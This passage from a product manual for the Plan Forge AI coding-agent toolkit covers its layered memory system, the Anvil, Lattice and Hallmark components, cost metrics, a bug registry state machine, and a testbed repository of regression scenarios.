The hub is a single EventEmitter instance in pforge-mcp/hub.mjs. Every event (slice start, model choice, tool result, memory capture) flows through it:

Subscribers: WebSocket clients (the dashboard), the watcher worker, the OpenBrain drain worker, anything listening for memory-captured
Replay file: every event also appends to .forge/hub-events.jsonl so a fresh dashboard can rebuild state on connect
Worker capability probe: workers announce which event types they handle so the hub can drop unhandled events early instead of fanning out garbage

L2 — The Files

Every memory file lives under .forge/ as line-delimited JSON. Each record carries a schema version field _v so the format can evolve without breaking older data:

File	Contents
memory-captures.jsonl	Raw capture log, every `captureMemory` call
gotchas.jsonl	Type-routed: `type: "gotcha"`
lessons.jsonl	Type-routed: `type: "lesson"`
decisions.jsonl	Type-routed: `type: "decision"`
patterns.jsonl	Type-routed: `type: "pattern"`
conventions.jsonl	Type-routed: `type: "convention"`
openbrain-queue.jsonl	Pending L3 deliveries (drain worker source)
openbrain-dlq.jsonl	Permanently failed L3 deliveries
hub-events.jsonl	L1 replay log
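The type routing in the table can be sketched as a small lookup. The mapping rule (type plus "s.jsonl") is inferred from the file names above, and both helper names are hypothetical.

```javascript
// Types named in the table above.
const ROUTED_TYPES = new Set(["gotcha", "lesson", "decision", "pattern", "convention"]);

// Return the files one capture would be appended to.
function targetFilesFor(record) {
  const files = ["memory-captures.jsonl"]; // the raw log receives every capture
  if (ROUTED_TYPES.has(record.type)) files.push(`${record.type}s.jsonl`);
  return files;
}

// Serialize a record as one JSONL line carrying the schema version field.
function toJsonlLine(record, version = 1) {
  return JSON.stringify({ _v: version, ...record }) + "\n";
}

console.log(targetFilesFor({ type: "gotcha" })); // [ 'memory-captures.jsonl', 'gotchas.jsonl' ]
```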

The Memory tab in the dashboard renders this exact set as a live KPI strip + per-file breakdown; see the dashboard chapter. The data comes from forge_memory_report, also exposed at GET /api/memory/report.

L3 — OpenBrain Bridge

OpenBrain is the cross-project semantic store (pgvector + thought metadata). Plan Forge never writes to it directly during a tool call; that would couple every tool's latency to the OpenBrain endpoint. Instead, the path goes through the Anvil boundary: a small piece of code that owns delivery, capability negotiation, and failure recovery so the calling tool only ever talks to a local queue.

captureMemory appends one line to .forge/openbrain-queue.jsonl (microseconds, local I/O)
The Anvil drain worker wakes on a timer or hub event, negotiates capabilities with the L3 endpoint, batches pending lines, and POSTs them to OpenBrain
Successes are removed from the queue. Failures retry up to N times, then land in openbrain-dlq.jsonl, the dead-letter queue that the next boot drains automatically
A drain-trend rolling window in forge_memory_report exposes pass/fail/deferred counts so the Memory tab can flag a stuck pipeline
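One drain pass with retry counting and a dead-letter queue might look like the sketch below. It is synchronous and in-memory for brevity and is not the Anvil implementation: `send` stands in for the POST to OpenBrain, and drainOnce, the attempts field, and the default of three attempts are assumptions (the text only says "up to N times").

```javascript
// Process every queued item once; failures are retried later or dead-lettered.
function drainOnce(queue, send, maxAttempts = 3) {
  const remaining = [];
  const deadLetters = [];
  let delivered = 0;
  for (const item of queue) {
    try {
      send(item.record);
      delivered += 1; // success: the item leaves the queue
    } catch (err) {
      const attempts = (item.attempts || 0) + 1;
      const next = { ...item, attempts, lastError: String(err.message || err) };
      if (attempts >= maxAttempts) deadLetters.push(next); // give up: dead-letter it
      else remaining.push(next);                           // keep for the next pass
    }
  }
  return { remaining, deadLetters, delivered };
}
```

The returned counts (delivered, remaining, dead-lettered) are the kind of per-pass numbers a drain-trend window could aggregate.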

OpenBrain not configured? The queue still fills harmlessly. captureMemory never fails because of L3. When you later set openbrain.endpoint in .forge.json, the next drain pass ships the backlog.

L3 → L1 Preload

When forge_run_plan emits run-started, the orchestrator calls buildPlanBootContext(plan, projectName) to derive a small set of semantic queries the agent should pre-fetch from L3 before slice 1:

plan-history hint: keyed off the plan name (plan Phase-1-AUTH), surfaces prior decisions on the same plan
slice-keyword hints: derived from slice titles via the keyword search map (e.g. "database" → database migration patterns, "api" → API endpoint design patterns), deduped and capped at 8

The hints are emitted as a memory-preload hub event. Any agent runtime listening (Copilot, Claude Code, Cursor) can resolve the hints via search_thoughts and seed its working context, eliminating the cold-start "what did we learn last time" gap.
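The hint derivation can be sketched as a keyword lookup with dedup and a cap. This is a hypothetical stand-in for buildPlanBootContext that returns only the query strings. The two map entries come from the examples above; applying the cap of 8 to the keyword hints rather than to the whole list is an assumption.

```javascript
// Keyword map entries taken from the examples in the text; the real map is larger.
const KEYWORD_QUERIES = {
  database: "database migration patterns",
  api: "API endpoint design patterns",
};

function buildPreloadHints(planName, sliceTitles, cap = 8) {
  const keywordHints = [];
  for (const title of sliceTitles) {
    const lower = title.toLowerCase();
    for (const [keyword, query] of Object.entries(KEYWORD_QUERIES)) {
      // Dedupe: each query appears once, however many slices mention the keyword.
      if (lower.includes(keyword) && !keywordHints.includes(query)) keywordHints.push(query);
    }
  }
  return [`plan ${planName}`, ...keywordHints.slice(0, cap)];
}

console.log(buildPreloadHints("Phase-1-AUTH", ["Add database schema", "Expose API endpoint", "Database indexes"]));
```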

Watcher → Memory

The file watcher (chapter 6 — Watcher tab) doesn't just emit FS events, it drives capture. When a file change matches a watcher rule, the watcher composes a buildWatcherSearchPrompt payload and pushes it through the same captureMemory path so the change becomes a first-class L2 record and an L3 query.

This closes the loop where edits made between plan slices used to vanish from memory. Now the watcher feeds L1/L2/L3 just like any tool would.

Source Attribution

Every capture carries a source field with a strict format: <tool> or <tool>/<subsystem>. validateSourceFormat rejects anything else. This means the Memory tab's "by tool" breakdown is always accurate, with no untagged drift.

Examples

// Valid
"forge_run_plan"
"forge_run_plan/slice-executor"
"watcher/fs-rule"
"hook/pre-deploy"

// Rejected (logged, capture still proceeds, source replaced with "unknown")
"My Tool"
"forge_run_plan / slice-executor"   // spaces around slash
""
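A validator consistent with the examples above could be as small as one regular expression. The grammar here (lowercase identifiers, at most one "/subsystem" part) is an assumption; the real validateSourceFormat may accept a different character set.

```javascript
// Assumed grammar: <tool> or <tool>/<subsystem>, lowercase, no spaces.
const SOURCE_PATTERN = /^[a-z][a-z0-9_-]*(\/[a-z][a-z0-9_-]*)?$/;

// Hypothetical helper: invalid sources are replaced, so the capture still proceeds.
function normalizeSource(source) {
  const valid = typeof source === "string" && SOURCE_PATTERN.test(source);
  return { source: valid ? source : "unknown", valid };
}

console.log(normalizeSource("watcher/fs-rule").source); // watcher/fs-rule
console.log(normalizeSource("My Tool").source);         // unknown
```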

Migration: pforge migrate-memory

Schema changes (the _v field bumps) are handled by the migration switch in pforge.ps1 / pforge.sh:

Terminal

# Inspect what would migrate (no writes)
pforge migrate-memory --dry-run

# Apply: rewrites every .forge/*.jsonl record to the latest _v
pforge migrate-memory

# Migration is idempotent: running twice is a no-op

Originals are backed up to .forge/.migration-backup-<timestamp>/ before any rewrite.
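Idempotence falls out naturally when the per-record upgrade is a no-op for records already at the latest version. The sketch below shows that property on an in-memory JSONL string. The helper names and the choice to treat unversioned records as version 0 are assumptions, not the behavior of pforge migrate-memory.

```javascript
const LATEST_VERSION = 1; // matches the _v:1 stamp mentioned in this chapter

// Upgrade one record; records already at the latest version pass through untouched.
function migrateRecord(record) {
  const current = Number.isInteger(record._v) ? record._v : 0;
  if (current >= LATEST_VERSION) return record;
  return { ...record, _v: LATEST_VERSION };
}

// Rewrite every non-empty line of a JSONL document.
function migrateJsonl(text) {
  return text
    .split("\n")
    .filter((line) => line.trim() !== "")
    .map((line) => JSON.stringify(migrateRecord(JSON.parse(line))))
    .join("\n");
}

const once = migrateJsonl('{"type":"lesson"}\n{"_v":1,"type":"gotcha"}\n');
const twice = migrateJsonl(once);
console.log(once === twice); // true: the second run changes nothing
```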

Telemetry & Reporting

Three helpers in memory.mjs drive everything the dashboard shows:

buildCaptureTelemetry(): totals, deduped count, and by-tool and by-type histograms (cosine-similarity dedup at write time)
buildCacheEntry() + isCacheEntryFresh(): search-result cache with TTL stamping (stampThoughtExpiry) and read-time filtering (filterUnexpiredThoughts)
buildMemoryReport(projectDir): assembles the full payload behind forge_memory_report / /api/memory/report: file inventory, version distribution, queue depth, drain trend, orphan detection
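The TTL stamping and read-time filtering pair can be illustrated with two small functions. These are hypothetical stand-ins, not the signatures of stampThoughtExpiry or filterUnexpiredThoughts, and the expiresAt field name is an assumption.

```javascript
// Stamp a thought with an absolute expiry time (milliseconds since epoch).
function stampExpiry(thought, ttlMs, now = Date.now()) {
  return { ...thought, expiresAt: now + ttlMs };
}

// Drop thoughts whose expiry has passed; unstamped thoughts are kept.
function filterUnexpired(thoughts, now = Date.now()) {
  return thoughts.filter((t) => typeof t.expiresAt !== "number" || t.expiresAt > now);
}

const stamped = stampExpiry({ id: 1 }, 1000, 0); // expires at t = 1000
console.log(filterUnexpired([stamped], 500).length);  // 1 (still fresh)
console.log(filterUnexpired([stamped], 1000).length); // 0 (expired)
```

Passing `now` explicitly keeps both functions deterministic and easy to test.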

How the Shop Remembers

The plain-English tour of Plan Forge's upgraded memory system, and the reason a cheaper, faster model can now do work that used to require the expensive one.

New here? Start with this. The previous chapter (Memory Architecture) explains the three-tier plumbing (L1 hub, L2 files, L3 OpenBrain). This chapter explains, in plain language, what we added on top: the maker's mark on every record (Hallmark), the safer doorway to the shared brain (Anvil), the code-map that lets the agent ask "who calls this function?" (Lattice), and the bridge that hands all of it to Copilot's own memory (forge_sync_memories).

Still three tiers. L1/L2/L3 didn't go away. We forged better tools around them.
Still one capture call. Your code doesn't change. The shop just remembers more reliably now.
The payoff is measurable. Drift dropped 64% over 90 days. A 7-slice plan now executes for $0.07 on Sonnet alone, no Opus escalation.

What's in this chapter: a one-page mental model of the four new pieces, a day-in-the-life walkthrough of a slice, the cheaper/faster-model story with real numbers from this very repo, three commands you can run today, and where to look on the dashboard.

The Four New Pieces

Think of the forge shop. The L1/L2/L3 memory tiers are the workbench, the filing cabinet, and the library across town. They were already there. What we added is the craftsmanship around them:

Piece	The shop metaphor	What it actually does
Hallmark	The maker's mark stamped into the metal; it proves who forged it, when, and from what stock.	A small JSON envelope (`hallmark/v1`) attached to every memory record and artifact. Lets any tool ask "is this still the version I think it is?" and catch drift before it bites.
Anvil	The anvil where everything gets struck: solid, reliable, never drops the hammer.	The boundary code that delivers L2 records to OpenBrain (L3). Adds a dead-letter queue, a capability handshake, and a boot-time drain so a network blip never loses a memory.
Lattice	The map of the shop: every workbench, every tool, every chain pulley, indexed by where it sits.	A code-graph index over your repo. Splits source into semantic chunks, records who-calls-whom, and answers "show me everyone who calls `executeSlice`" in milliseconds.
forge_sync_memories	The dispatch rider that carries shop news to the wider guild.	A soft-sync that copies decisions/lessons/gotchas from `.forge/` into Copilot's own Memory store, so VS Code agents see them automatically next session.

Why "soft" sync? From our side, Copilot Memory is append-only: we can write, but we can't delete what the user has curated. So the sync is additive only, never destructive. Deduplication is handled by content hash, so re-running is safe.
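An additive, hash-deduped sync can be sketched as follows. The choice of SHA-256, the record shape, and the softSync name are assumptions for illustration. The set of remote hashes stands in for whatever Copilot Memory already holds.

```javascript
const { createHash } = require("node:crypto");

// Content hash used as the dedup key.
function contentHash(text) {
  return createHash("sha256").update(text, "utf8").digest("hex");
}

// Return only the records the remote has not seen; never remove anything.
function softSync(localRecords, remoteHashes) {
  const written = [];
  for (const record of localRecords) {
    const hash = contentHash(record.content);
    if (remoteHashes.has(hash)) continue; // already synced: skip
    remoteHashes.add(hash);
    written.push(record);
  }
  return written;
}

const remote = new Set();
const records = [{ content: "use snake_case ids" }, { content: "pin extension versions" }, { content: "use snake_case ids" }];
console.log(softSync(records, remote).length); // 2 (the repeated record is collapsed)
console.log(softSync(records, remote).length); // 0 (re-running writes nothing)
```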

A Day in the Life of a Slice

Here's what happens when pforge run-plan starts executing slice 3 of your plan. Every step touches at least one memory subsystem:

Preload: The orchestrator calls buildPlanBootContext and emits a memory-preload event with semantic queries derived from the slice's Scope Contract. The agent runtime (Copilot, Claude, Cursor) catches the event and runs search_thoughts against L3 + a latticeQuery against the code-graph. The agent now knows what prior slices learned and which files are relevant, before it reads a single line.
Execute: The agent edits files. When it hits a tricky pattern ("Windows shell quoting breaks grep -c when piped into a brace group"), it calls capture_thought with type gotcha. The capture path stamps the record with a fresh Hallmark envelope and writes to L1 (instant), L2 (durable), and queues it for L3.
Anvil delivery: A background drainer pulls from .forge/openbrain-queue.jsonl and pushes to OpenBrain. If OpenBrain is down or rejects the schema, the record lands in .forge/openbrain-dlq.jsonl instead of vanishing. The next boot drains the DLQ automatically.
Verify with Lattice: Before declaring the slice done, the agent runs latticeCallers on every function it touched. If the call graph shows an unexpected caller (a test it forgot about, or a sibling slice's import), the slice gate catches it. This is the step that prevents "I refactored X and didn't realize Y depended on it."
Sync out: At slice end, forge_sync_memories copies new decisions and lessons into Copilot Memory. Tomorrow's VS Code session sees them in the global memory pane without anyone running anything.

Why Cheaper, Faster Models Now Punch Above Their Weight

This is the part most teams don't expect.

The classic AI cost equation goes better model → fewer mistakes → less wasted spend. That's still true, but it ignores a second lever: context quality. A medium-tier model with the right context will routinely outperform a flagship model with vague context. Memory is context. And the memory upgrades make the context dramatically better.

Here's the receipt, measured on this repo over the last 90 days:

Metric	Before the upgrades	After (current)	What it means
Drift score	22	8	Architecture decay per session, lower is better. −64%.
Sonnet-4.6 success rate	~78% (estimated)	91% (332 / 365 slices)	Cheaper model now beats what Opus did a quarter ago.
Cost per slice	~$0.09	$0.04	Less re-reading, less back-and-forth, less escalation. ~55% cheaper.
Opus escalation rate	Multiple slices per plan	Zero on QA-class plans	The memory-QA plan executed 7 slices for $0.07 on Sonnet alone.
OpenBrain DLQ depth	N/A (would have dropped)	0 (Anvil catches all)	Zero memories lost to transient L3 failures.
Telemetry dedup rate	~0% (no dedup)	62.5% (10 of 16)	Hallmark's content hash collapses redundant writes.
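The percentages in the table can be re-derived from the raw figures in the same rows. The snippet below does only that arithmetic; the helper names are illustrative.

```javascript
// Relative reduction from `before` to `after`, as a percentage.
function percentDrop(before, after) {
  return ((before - after) / before) * 100;
}

// Share of `part` in `whole`, as a percentage.
function percentOf(part, whole) {
  return (part / whole) * 100;
}

console.log(percentDrop(22, 8).toFixed(1));      // 63.6 (drift score, reported as -64%)
console.log(percentDrop(0.09, 0.04).toFixed(1)); // 55.6 (cost per slice, reported as ~55%)
console.log(percentOf(332, 365).toFixed(1));     // 91.0 (Sonnet success rate)
console.log(percentOf(10, 16).toFixed(1));       // 62.5 (telemetry dedup rate)
console.log((0.07 / 7).toFixed(2));              // 0.01 (dollars per slice on the 7-slice QA plan)
```

The cost figure lands nearer 56% than 55% because both inputs are themselves rounded ("~$0.09"), so the table's "~55%" is consistent with it.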

How the four pieces compound

Hallmark means the agent can trust that "lesson learned in slice 2" is exactly what it was when written. No silent schema drift. The cheaper model doesn't waste tokens re-deriving facts it already has.
Anvil means recall is reliable. Pre-upgrade, a network hiccup could silently drop a memory and the next slice would re-learn the same gotcha. Now the DLQ catches it and the boot drainer replays it.
Lattice means the agent finds the right files without scanning the whole repo. "Who calls this function?" is a 50ms query instead of a 50-second grep-and-read. Fewer tokens, more accurate edits.
forge_sync_memories means knowledge crosses session boundaries automatically. The next session's cheaper model starts already knowing what the last session's expensive model figured out.

Put bluntly: the memory upgrades subsidize the model choice. You can pick Sonnet (or another mid-tier) and let memory carry the load that used to require Opus reasoning. The savings show up in the cost ledger; the quality shows up in the drift score.

The Phase-MEMORY-QA receipt. When we tested the memory upgrades themselves, the QA plan (7 slices, full E2E with mock OpenBrain, lattice callers, hallmark show/verify, backward-compat checks) ran for $0.07 total in ~51 minutes, 100% on Sonnet-4.6, no escalation, zero failed slices. The system QA'd itself with the very upgrades it was QA'ing, and did it for the price of a coffee. That's the loop closing.

Three Commands You Can Run Today

The memory subsystems are exposed through the pforge CLI and the MCP server. Here are the three you'll use most:

1. Search the code graph (Lattice)

# What does the agent see when it asks "where is snapshot restore handled?"
pforge lattice query "snapshot restore"

# Who calls this function?
pforge lattice callers executeSlice

# What does this function call?
pforge lattice callees attachSliceSnapshotRestore
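Conceptually, the callers and callees queries are filters over the edge list. The sketch below assumes an edge shape of { from, to }, meaning "from calls to"; the actual record layout in .forge/lattice/edges.jsonl is not documented here. Only executeSlice and attachSliceSnapshotRestore appear in this manual; the other function names are made up for the example.

```javascript
const edges = [
  { from: "runPlan", to: "executeSlice" },
  { from: "retrySlice", to: "executeSlice" },
  { from: "executeSlice", to: "attachSliceSnapshotRestore" },
  { from: "runPlan", to: "executeSlice" }, // duplicate edge, collapsed below
];

// Everyone who calls `fn`, deduplicated and sorted.
function callersOf(graph, fn) {
  return [...new Set(graph.filter((e) => e.to === fn).map((e) => e.from))].sort();
}

// Everything `fn` calls, deduplicated and sorted.
function calleesOf(graph, fn) {
  return [...new Set(graph.filter((e) => e.from === fn).map((e) => e.to))].sort();
}

console.log(callersOf(edges, "executeSlice")); // [ 'retrySlice', 'runPlan' ]
console.log(calleesOf(edges, "executeSlice")); // [ 'attachSliceSnapshotRestore' ]
```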

2. Inspect the memory subsystem (any time)

# Health of every memory surface: L2 files, OpenBrain queue, DLQ, dedup rate, orphans
pforge memory report

# 90-day trend across drift / cost / models / incidents
pforge health-trend --days 90

3. Sync local decisions into Copilot Memory

# Push new decisions / lessons / gotchas into Copilot's own memory store.
# Safe to re-run, dedupes by content hash.
pforge sync-memories

# Dry-run preview (shows what would be written, writes nothing)
pforge sync-memories --dry-run

Where to Look on the Dashboard

The live dashboard (localhost:3100/dashboard) added an Anvil & Lattice tab when these subsystems shipped. From there you can see:

Anvil panel: current OpenBrain queue depth, DLQ depth, last-drain timestamp, drain success rate over time. A non-zero DLQ depth that doesn't clear within a drain pass is your only "go look at this" signal.
Lattice panel: index size (chunks, edges, files), last-rebuild timestamp, top-N hottest functions by caller count. Rebuild from here if you've made structural changes outside a plan run.
Hallmark coverage: percentage of L2 records carrying a _v stamp. Should sit at 100% for newly-written records; older records may show none.

How the New Pieces Fit the Old Tiers

To make sure the mental model holds, here's the same picture from Chapter 21 with the new pieces drawn in:

The memory stack, layered, not replaced

┌─────────────────────────────────────────────────────────────────┐
│  Copilot Memory (cross-session, IDE-wide)                       │
│       ▲                                                         │
│       │ forge_sync_memories  (additive, hash-deduped)           │
│  ┌────┴─────────────────────────────────────────────────────┐   │
│  │  L3: OpenBrain (pgvector, cross-project)                 │   │
│  │       ▲                                                  │   │
│  │       │ Anvil  (DLQ + capability handshake + boot drain) │   │
│  │  ┌────┴─────────────────────────────────────────────┐    │   │
│  │  │  L2: .forge/*.jsonl   (Hallmark-stamped, _v:1)   │    │   │
│  │  │  L1: Hub (in-process, runId-scoped)              │    │   │
│  │  └──────────────────────────────────────────────────┘    │   │
│  └──────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Parallel axis (not a tier):                                    │
│    Lattice: .forge/lattice/{chunks,edges}.jsonl                 │
│      (code-graph; queried alongside, not stacked on, memory)    │
└─────────────────────────────────────────────────────────────────┘

L1/L2/L3 are the same tiers. Hallmark adds a contract to what gets written. Anvil hardens the L2 → L3 doorway. forge_sync_memories pushes upward into Copilot. Lattice sits beside everything as a separate code-graph axis the agent queries the same way it queries memory.

The Bug Registry

Every bug, fingerprinted. Every fix, validated. The registry remembers.

Closed-loop tracker. Four tools form a closed loop: forge_bug_register → forge_bug_list → forge_bug_update_status → forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json.

Why a Registry?

Bugs found by the Tempering quorum, visual-diff scanners, or regression guard used to live in ad-hoc CHANGELOG entries and stray comments. They got fixed, forgotten, and then re-discovered three sprints later with different symptoms. The Bug Registry gives every scanner-discovered bug a durable record: fingerprinted, classified, tracked, and validated.

Fingerprint Dedup

When a bug is registered, the classifier computes a fingerprint from the scanner name + test name + assertion message + normalized stack trace. Re-registering the same fingerprint returns DUPLICATE_BUG with the existing bugId, so the registry stays free of noise and duplicates.
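Fingerprint dedup can be sketched as hashing the four inputs after normalizing the stack trace. Everything below is illustrative: the normalization rule (stripping line and column numbers), the SHA-256 hash, the bug id format, and the "OK" result code are assumptions. Only DUPLICATE_BUG comes from the text.

```javascript
const { createHash } = require("node:crypto");

// Assumed normalization: drop ":line:col" suffixes so moved code still matches.
function normalizeStack(stack) {
  return stack
    .split("\n")
    .map((line) => line.trim().replace(/:\d+:\d+/g, ""))
    .filter((line) => line !== "")
    .join("\n");
}

function fingerprint({ scanner, testName, assertion, stack }) {
  const material = [scanner, testName, assertion, normalizeStack(stack)].join("\u0000");
  return createHash("sha256").update(material, "utf8").digest("hex").slice(0, 16);
}

// `registry` is a Map from fingerprint to bugId.
function registerBug(registry, evidence) {
  const fp = fingerprint(evidence);
  const existing = registry.get(fp);
  if (existing) return { code: "DUPLICATE_BUG", bugId: existing };
  const bugId = `bug-${registry.size + 1}`;
  registry.set(fp, bugId);
  return { code: "OK", bugId };
}
```

Because line numbers are stripped before hashing, the same failure reported after an unrelated edit shifts the file still maps to the existing record.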

The Status Lifecycle

Bug registry status machine: bugs start in 'open' (just registered, amber). Forward progression: open -> in-fix (work in progress) -> fixed (terminal green) after forge_bug_validate_fix re-runs the originating scanner and the gate passes. If the validation gate fails, the bug stays in-fix with an entry appended to bug.validationAttempts[]. From 'open' there are two side classifications to dashed gray terminal states: wont-fix and duplicate (links to original). Backward transitions from any terminal state are forbidden (red dashed line crossed out). Fingerprint dedupes on register; re-registering an existing fingerprint does not open a new bug ID.

Every bug moves through an explicit state machine:

Valid status transitions

open → in-fix → validating → fixed
             ↘ wont-fix
             ↘ duplicate
open → noise       (classifier ruled it a false positive)

Transitions are enforced by forge_bug_update_status. An illegal transition returns INVALID_TRANSITION.
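Transition enforcement of this kind is usually a lookup table plus one guard. The table below is one reading of the arrows listed above, not the registry's actual table: it assumes wont-fix and duplicate are reached from open (as the figure description states), and that a failed validation returns the bug to in-fix. The function name and result shape are hypothetical.

```javascript
// Allowed next states per current state (assumed, see the lead-in).
const TRANSITIONS = {
  open: ["in-fix", "wont-fix", "duplicate", "noise"],
  "in-fix": ["validating"],
  validating: ["fixed", "in-fix"], // a failed validation goes back to in-fix
  fixed: [],
  "wont-fix": [],
  duplicate: [],
  noise: [],
};

function updateStatus(bug, nextStatus) {
  const allowed = TRANSITIONS[bug.status] || [];
  if (!allowed.includes(nextStatus)) {
    return { ok: false, code: "INVALID_TRANSITION", from: bug.status, to: nextStatus };
  }
  return { ok: true, bug: { ...bug, status: nextStatus } };
}

console.log(updateStatus({ id: "bug-1", status: "open" }, "in-fix").ok);   // true
console.log(updateStatus({ id: "bug-1", status: "fixed" }, "open").code);  // INVALID_TRANSITION
```

Terminal states map to empty arrays, so every backward move out of them is rejected by the same guard.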

Classification

The classifier inspects evidence (test name, assertion message, stack trace, flakiness history) and returns one of:

real-bug: evidence is consistent across scanners; record is persisted and captured to L3 memory.
flaky: evidence shows inconsistency; ignored unless confirmed across multiple runs.
noise: a triage classification applied by the audit classifier (e.g. "known false-positive pattern"). It is not a bug status. Bugs flagged as noise are typically resolved as wont-fix with the classification recorded in bug.triage.

Only real-bug outcomes write to .forge/bugs/ and fire tempering-bug-registered.

Closed-Loop Fix Validation

forge_bug_validate_fix re-runs the scanner that originally found the bug. On pass, the record moves to fixed, a tempering-bug-validated-fixed event fires, and, if OpenBrain is configured, an L3 thought is written so the next session knows what broke and what fixed it.

Scanner override. If the original scanner is no longer registered, pass scannerOverride to validate with an equivalent. The validation log preserves both scanner names for audit.

Where You See It

The dashboard's Triage tab shows open bugs by severity, with status chips and quick-transition buttons. The Watcher's Home chip includes an open bugs count. Cross-linked to incidents via forge_incident_capture.

Forge laboratory with brass test fixtures and glass vials each holding a glowing micro-blueprint, scenario replay against a dedicated fixture repo

Act IV, Learn · Chapter 24

The Testbed

A separate repo. A library of scenarios. End-to-end proof that the shop still works.

New here? Read this first. Unit tests check one function. Integration tests check one service. Neither tells you whether Plan Forge itself still works end-to-end on a real codebase, the way you'd actually use it. The Testbed solves that. It's a separate sandbox repo (a real .NET app called TimeTracker) that Plan Forge uses as a punching bag: replay a known scenario, see if the full pipeline produces a clean shippable outcome, record what broke.

Why a separate repo? So Plan Forge can break things, commit, revert, and try again, without ever touching your real project.
Why a library of scenarios? Each scenario is a JSON file describing a known regression (e.g. “agent dropped a test file last release; catch it”). Run them all and you know the forge still holds.
Who needs this? You don't, day-to-day. The Testbed is mainly for Plan Forge maintainers and platform teams who want regression coverage of the tool itself. Skip ahead unless that's you.

Tool: forge_testbed_run. Scenarios: docs/plans/testbed-scenarios/*.json. Findings: docs/plans/testbed-findings/*.json. Requires testbed.path in .forge.json.

Why a Separate Testbed?

Unit tests cover one module; integration tests cover one service. Neither tells you whether the full Plan Forge pipeline still produces a clean, shippable outcome on a real repo under a real scenario. The Testbed does: it's a second, dedicated repository that Plan Forge treats as a read-write fixture, replays a scenario against, and uses to record the defect log.

Learn-by-Doing: The Reference Testbed

The canonical reference testbed lives at srnichols/plan-forge-testbed. It's a real .NET 10 application called TimeTracker: a billable-hours tracker with Clients, Projects, Time Entries, Billing, Invoices, and Dashboard surfaces, used as the worked example throughout this manual.

If you're learning Plan Forge by doing, work through it in this order:

1. Backend slices (docs/plans/Phase-1-CLIENTS-CRUD-PLAN.md): see how pforge run-plan drives a four-slice CRUD feature with [P] parallelism, [depends:], [scope:], and validation gates.
2. UI slices (docs/plans/Phase-2-WEB-UI-PLAN.md): Plan Forge builds a Blazor Server + Microsoft Fluent UI front-end against the existing REST API. The plan demonstrates that pforge produces enterprise-grade UI: layered (page → service interface → repository, never DbContext in components), accessible (WCAG 2.1 AA), and tested (bUnit). This is the proof artifact for "pforge does not vibe-code."
3. Operational scenarios (docs/plans/testbed-scenarios/*.json): the synthetic regressions in the section below, replayed end-to-end via forge_testbed_run.

The .NET preset ships three artifacts that make Step 2 work on any consuming project; they're not testbed-specific:

Artifact	Path	Purpose
Instruction file	`.github/instructions/blazor-fluent-ui.instructions.md`	Auto-loads on `*.razor` edits. Forbids `DbContext` in components, mandates code-behind split, lifecycle discipline, accessibility checklist.
Reviewer agent	`.github/agents/blazor-reviewer.agent.md`	Read-only audit of UI changes for layer violations, lifecycle bugs, and Fluent UI misuse.
Skill	`.github/skills/ui-scaffold/SKILL.md`	`/ui-scaffold <Entity> --crud` generates the page + DTO + service interface + bUnit test in one shot, enforcing the layering rules.

Why a UI demo? Backend slices are easy to make look impressive: they're terse, type-safe, and their gates are straightforward. UI is where vibe-coding usually wins on speed and loses on quality. The Phase-2 UI plan exists to demonstrate that Plan Forge produces UI you'd actually deploy: separation of concerns intact, no DbContext in .razor, every page accessible, every component tested.

Scenario Fixtures

Scenarios are JSON files under docs/plans/testbed-scenarios/. Each one describes:

Initial state: branch, commit, known-good baseline.
Instructions: the prompt / plan the agent will execute.
Expected artifacts: which files must change, which must not.
Gates: build, test, lint, drift thresholds.

A scenario is idempotent: the Testbed resets the fixture repo to the pinned commit before every run.
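As a rough illustration of the four parts listed above, here is a minimal sketch of a fixture check. The field names (`initialState`, `instructions`, `expectedArtifacts`, `gates`), the example paths, and the `validateScenario` helper are all assumptions made for this sketch, not the real scenario schema; call forge_capabilities for the authoritative shape.

```javascript
// HYPOTHETICAL scenario shape: field names and paths mirror the four parts
// listed above and are NOT taken from the real Plan Forge schema.
const exampleScenario = {
  initialState: { branch: "main", commit: "a1b2c3d" },
  instructions: "docs/plans/Phase-1-CLIENTS-CRUD-PLAN.md",
  expectedArtifacts: { mustChange: ["src/Clients/"], mustNotChange: ["src/Billing/"] },
  gates: { build: true, test: true, lint: true, maxDrift: 0.1 },
};

// Returns a list of problems; an empty list means the fixture looks usable.
function validateScenario(scenario) {
  const problems = [];
  for (const key of ["initialState", "instructions", "expectedArtifacts", "gates"]) {
    if (scenario[key] === undefined) problems.push(`missing section: ${key}`);
  }
  // An idempotent replay needs a pinned commit to reset the fixture repo to.
  if (scenario.initialState && !scenario.initialState.commit) {
    problems.push("initialState.commit must pin a baseline commit");
  }
  return problems;
}

console.log(validateScenario(exampleScenario)); // []
```

The pinned-commit check reflects the idempotency rule: without a commit to reset to, two runs of the same scenario could start from different states.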

Anatomy of a Run

forge_testbed_run:

Acquires .forge/testbed.lock (one scenario at a time per testbed).
Verifies the testbed is clean (ERR_TESTBED_DIRTY if not).
Replays the scenario end-to-end in the testbed directory.
Captures artifacts, run metrics, and any defects.
Writes a finding JSON under docs/plans/testbed-findings/ and emits testbed-scenario-completed.
Releases the lock.
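The six steps above can be sketched with an in-memory stand-in for the testbed. This is a simplified model, not the real implementation: the actual tool works against a git repository and a lock file on disk, and `makeTestbed`, `runScenario`, and the `replay` callback are hypothetical names. Only the error codes and the event name come from this chapter.

```javascript
// In-memory stand-in for a testbed. All helper names here are hypothetical.
function makeTestbed({ dirty = false } = {}) {
  return { dirty, locked: false, findings: [], events: [] };
}

function testbedError(code) {
  const err = new Error(code);
  err.code = code;
  return err;
}

function runScenario(testbed, scenario, replay) {
  // 1. Acquire the lock: one scenario at a time per testbed.
  if (testbed.locked) throw testbedError("ERR_TESTBED_LOCKED");
  testbed.locked = true;
  try {
    // 2. Refuse to run against uncommitted changes.
    if (testbed.dirty) throw testbedError("ERR_TESTBED_DIRTY");
    // 3-4. Replay the scenario and capture its outcome.
    const outcome = replay(scenario);
    // 5. Record a finding and emit the completion event.
    const finding = { scenario: scenario.id, defects: outcome.defects };
    testbed.findings.push(finding);
    testbed.events.push("testbed-scenario-completed");
    return finding;
  } finally {
    // 6. Release the lock, even when one of the steps above throws.
    testbed.locked = false;
  }
}
```

Putting the release in a `finally` block is the design point worth copying: a failed replay should not leave a stale lock behind for the next run.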

Common Errors

Code	Meaning	Recovery
`ERR_TESTBED_NOT_FOUND`	`testbed.path` missing or invalid	Set it in `.forge.json`
`ERR_TESTBED_DIRTY`	Uncommitted changes in the testbed	Commit or stash inside the testbed repo
`ERR_TESTBED_LOCKED`	Another scenario is running	Wait, or remove a stale `.forge/testbed.lock`

Feedback Into the Loop

Findings with defects feed two consumers:

